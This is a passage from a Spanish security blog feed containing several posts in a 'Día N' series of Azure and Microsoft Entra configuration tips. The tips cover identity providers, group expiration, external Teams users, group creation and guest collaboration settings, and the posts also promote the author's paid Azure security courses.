interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-48981816882153060612024-01-15T09:31:00.004+01:002024-01-15T09:31:47.327+01:00Día 7: Revisa la configuración de tu Azure<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpEIQURoSbp_30wkAU208UBXRg2cnWcDSvJ0Q3wNgtsHloobFaWawh_v8rceq2K9c91EcN0PupPKdU5jtit4ZjDzmgp8ilFf2OwNK20yeZfXejVlejU65C2QMtqn86KHqxx-dF-8nUn4OP9fR3dDV2hLrowbQuSpMuLKww8hb6w0lrTlcLJLRwIGe_ctR0/s1200/formacion.seguridadsi.com%207.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpEIQURoSbp_30wkAU208UBXRg2cnWcDSvJ0Q3wNgtsHloobFaWawh_v8rceq2K9c91EcN0PupPKdU5jtit4ZjDzmgp8ilFf2OwNK20yeZfXejVlejU65C2QMtqn86KHqxx-dF-8nUn4OP9fR3dDV2hLrowbQuSpMuLKww8hb6w0lrTlcLJLRwIGe_ctR0/w640-h334/formacion.seguridadsi.com%207.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 7</b></h4><div>Proveedores de Identidad. Como sabes, puedes autenticarte en Azure y sus servicios con proveedores de identidad de varios tipos, una cuenta en Microsoft, en Azure, un one time password a un correo ajeno, una cuenta de linkedin, y cualquier proveedor que "hable" SAML, como Google... salesforce... Okta... vete tu a saber. </div><div>Es importante comprobar esta configuración <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/CompanyRelationshipsMenuBlade/~/IdentityProviders" target="_blank">AQUÍ,</a> para detectar si hay procedimientos de autenticación no controlados, como mecanismo de persistencia de algún gamberro.</div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-70794081802999597432024-01-09T09:27:00.001+01:002024-01-09T09:27:06.883+01:00Día 6: Revisa la configuración de tu Azure<p>Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><p><i><span style="color: red;">***NOTICIA. Hemos puesto los dos cursos de Azure, el grabado y el mentorizado a 500 euros durante una semana ( fin el sábado 13) . Sólo tienes que introducir el código: kinoelreymago. Recuerda que lo puedes financiar gratis con Paypal***</span></i></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO1jKhDOq7Sh8cE2bbs9lfZfMebIXFkFS8NHH28z7-qSVVhhdS-gys4nKae0wfr9HB68T0P88DKBKHaLqJrH0ifknoqiPz-u2H_yWwLktUTu0ow2_zMyFzjke0SNfNqKIp5TLqFQ1wYQuwGZO_uy74CCvK3GhKJytxLicvpGQc3OmJTw9SGq7vqmJ90tp-/s1200/formacion.seguridadsi.com%206.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO1jKhDOq7Sh8cE2bbs9lfZfMebIXFkFS8NHH28z7-qSVVhhdS-gys4nKae0wfr9HB68T0P88DKBKHaLqJrH0ifknoqiPz-u2H_yWwLktUTu0ow2_zMyFzjke0SNfNqKIp5TLqFQ1wYQuwGZO_uy74CCvK3GhKJytxLicvpGQc3OmJTw9SGq7vqmJ90tp-/w640-h334/formacion.seguridadsi.com%206.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 6</b></h4><h4><span style="font-weight: normal;"><i>En esta ocasión vamos a hablar de la caducidad de los grupos de O365 que se gestiona desde Microsoft Entra ( antiguo Azure AD). No hay que imaginar mucho, voy a empezar con ejemplos: Sale un proyecto de "lo que sea" y se crea un grupo de Teams, y metemos a un partner. Sale otro proyecto y metemos a 10 miembros. Sale otro proyecto y metemos a 4 partners, con 2 técnicos cada uno, y 12 internos... Hasta aquí bien?... Qué pasa con ese grupo dentro de un mes? dentro de 3 meses? Los miembros de los grupos SI puedan enviar adjuntos, compartir pantallas, y un gozan un poco más de confianza. No es lo mismo un mensaje anónimo de un tipo ofreciendote "Viagra" que si lo hace un consultor de confianza...que por supuesto ha sido comprometido.</i></span></h4><div><i>Los escenarios de ataque son innumberables, y la solución es muy sencilla, poner una fecha de borrado cuando pase tiempo de la inactividad.</i></div><div><i><br />Para ellos tenemos <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/GroupsManagementMenuBlade/~/Lifecycle" target="_blank">esta opción que debes mirar.</a></i></div><div><i><br /></i></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrbX-DynPW-4fsPs-OJTKPIM2H39gsybwO8hI_bTKRASCGrBAQGza4aA7yMjXVO8BP1MhROzfwjMTEoVAuunVMWD2rKhMDy98KL8FSH3EbeXMXk08RRgincxIWXHGX_Ry9hayKnJSZdQEqxCb5v0-AKy9XbsOnJ87Nh1mJyO56zjpgC2kku7Ok0Txm-6cd/s1353/Captura%20de%20pantalla%202024-01-09%20a%20las%209.20.57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="687" data-original-width="1353" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrbX-DynPW-4fsPs-OJTKPIM2H39gsybwO8hI_bTKRASCGrBAQGza4aA7yMjXVO8BP1MhROzfwjMTEoVAuunVMWD2rKhMDy98KL8FSH3EbeXMXk08RRgincxIWXHGX_Ry9hayKnJSZdQEqxCb5v0-AKy9XbsOnJ87Nh1mJyO56zjpgC2kku7Ok0Txm-6cd/w640-h324/Captura%20de%20pantalla%202024-01-09%20a%20las%209.20.57.png" width="640" /></a></div><br /><i>El setting es muy sencillo, personalizamos los días, le decimos a qué grupos, a todos o a ninguno, y establecemos un correo general de notificación para todos los grupos.</i></div><div><i><br /></i></div><div><i>Ojo, si un usuario entra al grupo, descarga un fichero, escribe en un chat, es decir, si el grupo tiene actividad, el contador no entra. El contador se "inicia" cuando pasan 35 días de inactividad, entonces entra el timing que hemos configurado.</i></div><div><i><br /></i></div><div><i>Las buenas prácticas me dicen que si un grupo/proyecto ha terminado, y le llega al admin del grupo un mail diciandole que se va a borrar, que lo archive !!! así no se perderán datos adjuntos, y no usarmos estos grupos de Teams como repos de ficheros.</i></div><div><i><br />Aparte, cualquier grupo borrado puede ser "reciclado" hasta pasados 30 días.</i></div><div><i><br /></i></div><div><i>Como ves, te estoy planteando pros y contras de su configuración, pero creo que más o menos relajada, es una política a configurar.</i></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div><p></p>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-14611032899683032512024-01-08T10:08:00.004+01:002024-01-08T10:10:35.386+01:00Día 5: Revisa la configuración de tu Azure<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><p><i><span style="color: red;">***NOTICIA. Hemos puesto los dos cursos de Azure, el grabado y el mentorizado a 500 euros durante una semana ( fin el sábado 13) . Sólo tienes que introducir el código: kinoelreymago. Recuerda que lo puedes financiar gratis con Paypal***</span></i></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglsaSqD7tWlvwn0cVT7l1HGFY1uTemk0g_3nazpWquBOO_1qpp8m60xNUv5NyEiaYBeO4sQkXvRQZBl06Jkr3ZCkoi12jASMRpKSc_INQr6QP0sS7KN-44Po-dCBtlagk9TkdHL7hl_CR5GBPtkAox0qrPkvroPEVzRZow-7kuF3fhvor2V5sDcTAOvwe9/s1200/formacion.seguridadsi.com%205.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglsaSqD7tWlvwn0cVT7l1HGFY1uTemk0g_3nazpWquBOO_1qpp8m60xNUv5NyEiaYBeO4sQkXvRQZBl06Jkr3ZCkoi12jASMRpKSc_INQr6QP0sS7KN-44Po-dCBtlagk9TkdHL7hl_CR5GBPtkAox0qrPkvroPEVzRZow-7kuF3fhvor2V5sDcTAOvwe9/w640-h334/formacion.seguridadsi.com%205.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><h4><b>Consejo 5</b></h4><p></p><ul><li><i>En esta ocasión vamos a saltar a O365, a Teams, para que veas lo peligros que es tener usuarios externos al tenant en Teams. Vemos como un atacante puede enviar adjuntos desde fuera... y cómo solucionarlo. Además, lo ponemos en video !!!</i></li></ul><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/-6CeuyGugFk" width="320" youtube-src-id="-6CeuyGugFk"></iframe></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-20523689954253452772024-01-05T08:48:00.005+01:002024-01-05T08:51:24.992+01:00Día 4: Revisa la configuración de Azure<p>Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><p><i><span style="color: red;">***NOTICIA. Hemos puesto los dos cursos de Azure, el grabado y el mentorizado a 500 euros durante una semana ( fin el sábado 13) . Sólo tienes que introducir el código: kinoelreymago. Recuerda que lo puedes financiar gratis con Paypal***</span></i></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6cF-XNrNHD6-Fw4pZWqnzyaO9PKc5z4L6dNbCe9pOrxj6wjEJ3292NqbOjSJuGhQFVauSPMMr_5oZV3MJfIrprmOBxhmWWatdO7raQUty8_w2e_OeKPTDRCG9nYB9A0ZjjD-vBQjzeg2KwONOlCTV4jCB2vaS8A9g9IfQ_HWV3g_qUIiBcHP6JYT00_l3/s1200/formacion.seguridadsi.com%204.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6cF-XNrNHD6-Fw4pZWqnzyaO9PKc5z4L6dNbCe9pOrxj6wjEJ3292NqbOjSJuGhQFVauSPMMr_5oZV3MJfIrprmOBxhmWWatdO7raQUty8_w2e_OeKPTDRCG9nYB9A0ZjjD-vBQjzeg2KwONOlCTV4jCB2vaS8A9g9IfQ_HWV3g_qUIiBcHP6JYT00_l3/w640-h334/formacion.seguridadsi.com%204.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><h4><b>Consejo 4</b></h4><p></p><ul><li><i>Grupos . <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/GroupsManagementMenuBlade/~/General" target="_blank">Comprobar.</a></i></li></ul><div><i>Por defecto no dejamos ver a los miembros no administradores de grupos las características del grupo ( si los miembros).</i></div><div><i>Denegar que los usuarios puedan crear grupos en el portal, api y powershell. NO me veo a los usuarios de negocio haciendo esto :-)</i></div><div><i>Lo mismo para Microsoft 365.</i></div><div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-32377450855433680022024-01-04T10:15:00.000+01:002024-01-04T10:15:26.945+01:00Día 3: Revisa la configuración de Azure<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8tHZdwZ9zW1QGt5y8O-N9QzNotmR_pG-kCVphK2eh-m0Y_uJ2M73PWLIG-9-H2QlX3-M_OyEGRpb3r-fh1X9LaxRI86qN3MOJTOidnvR83EcT3sQy013Lhe-VnVlERGKOfVb0hHSxlO7SSbzL97Q88SjKSCGRfu_LSz9cVLFd7Jctz5hPW9-TcVa4poXB/s1200/formacion.seguridadsi.com%203.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8tHZdwZ9zW1QGt5y8O-N9QzNotmR_pG-kCVphK2eh-m0Y_uJ2M73PWLIG-9-H2QlX3-M_OyEGRpb3r-fh1X9LaxRI86qN3MOJTOidnvR83EcT3sQy013Lhe-VnVlERGKOfVb0hHSxlO7SSbzL97Q88SjKSCGRfu_LSz9cVLFd7Jctz5hPW9-TcVa4poXB/w640-h334/formacion.seguridadsi.com%203.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><h4><b>Consejo 3</b></h4><p></p><ul><li><i>Colaboración externa. <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/CompanyRelationshipsMenuBlade/~/Settings">Comprobar.</a></i></li></ul><div><i>Como sabemos, Microsoft Entra, el antiguo Azure AD, es el corazón de la autenticación de los entornos Azure y las aplicaciones conectadas, como es el caso de Office 365. Un componente básico es el de las relaciones con terceros, con usuarios externos. Puedes invitar a un técnico y darle un usuario en tu tenant, o puedes invitar a tu tenant a un usuario externo y darle permisos en tu organización. Respecto a esto, lo más básico, la primera opción, se configuró en el día 2, es decir, que los usuarios invitados tengan restricciones, así en plan genérico.</i></div><div><i><br /></i></div><div><i>La segunda opción nos indica como comportarnos ante qué usuarios pueden invitar a externos. Podemos delegarlo a los administrados, a nadie, a los grupos global admin, user admin, guest admin. Aquí es importante que pienses en el negocio. Por ejemplo, imagina el caso de un jefe de departamento que tiene que dejar a un partner acceder a una aplicacíon, pues puedes montar un flujo de proceso en el que te lo diga, o darle el role de gestor de guest admin a los mandos que lo necesiten... Pero como siempre digo, alinea el negocio con la seguridad, y establece la directiva más restrictiva que puedas, e incopora en la política de empresa este concepto. Así no habrá sopresas cuando un jefe con más poder que tu te llame a rendir cuentas :-)</i></div><div><i><br /></i></div><div><i>En ese mismo settting tenemos la opción de habilitar los flujos de usuarios. Te aconsejo que le eches una vuelta. al final es configurar una seria de comportamientos, como quien va a ser el proveedor de identidades ( imagina que tu partner no usar Azure) o qué datos mínimos necesitas... mandarle un mail de confirmación, etc. Hay varios comportamientos a analizar.</i></div><div><i><br /></i></div><div><i>Hay otra opción que nos indica si queremos que un usuario abandone la organización, un externo...Aquí vuelvo a los procesos de empresa. Si estás en un compliance muy restricitivo y necesitas firmar un documento de "baja" o cese... pero esta opción es más de proceso que técnica, no le veo mucha recomendación que dar.</i></div><div><i><br /></i></div><div><i>Y por último, podemos "relajar" la configuración, indicando qué dominios puede recibir invitaciones. Podemos dejar que nuestros usuarios inviten, sin importar si son admins, y dejarles un puñado de dominios. O podemos dejarles todos los dominios, pero solo a un puñado de admins... al final, es un nivel más de granularidad, que como te indico, es importante justifiques con la operativa de la empresa.</i></div><div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/bundles/especialista-ofensivo-microsoft-certificacion" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y otro <a href="https://formacion.seguridadsi.com/courses/IV-edicion-especialista-en-seguridad-azure-y-365" target="_blank">Online en donde tienes 3 días</a> en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.</div><div>Como novedad para este año, si haces los ejercicios propuestos para la certificación y son correctos ( se revisan) obtendrás un certificado real, en papel. De esta manera distinguimos entre diploma de asistencia y diploma de certificación.</div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-26426868766225682012024-01-03T09:04:00.000+01:002024-01-03T09:04:13.481+01:00Día 2: Revisa la configuración de Azure<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>?</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQO3rcfNke9q9z1LJuhspDV6riNtAOUtAyH5JDiCjkDgLs6hSvN9qmUZXDmcuqjnoIB82cebk8R6fBLL7GRQAcpHMf40aHRgbxBITpF5Lsbdg3LworLzLPYJVeUHjD4kaam-FXDWLd1MuY1sfE99WvQDRQVWGTAa5FZgSvF9yjp-LVn5zDCE2LtbnTA7XD/s1200/formacion.seguridadsi.com%202.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQO3rcfNke9q9z1LJuhspDV6riNtAOUtAyH5JDiCjkDgLs6hSvN9qmUZXDmcuqjnoIB82cebk8R6fBLL7GRQAcpHMf40aHRgbxBITpF5Lsbdg3LworLzLPYJVeUHjD4kaam-FXDWLd1MuY1sfE99WvQDRQVWGTAa5FZgSvF9yjp-LVn5zDCE2LtbnTA7XD/w640-h334/formacion.seguridadsi.com%202.png" width="640" /></a></div><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><div class="separator" style="clear: both; text-align: left;"><br /></div></blockquote><p>Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </p><h4><b>Consejo 2</b></h4><p></p><ul><li><i>Configuración de usuarios. <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_UsersAndTenants/UserManagementMenuBlade/~/UserSettings">Comprobar.</a></i></li></ul><div><i>En esta ocasión vamos a comprobar varias configuraciones relativas a los usuarios en plan genérico, no en distintos tipos de usuarios o roles.</i></div><div><i><br /></i></div><div><div class="separator" style="clear: both; text-align: center;"><a 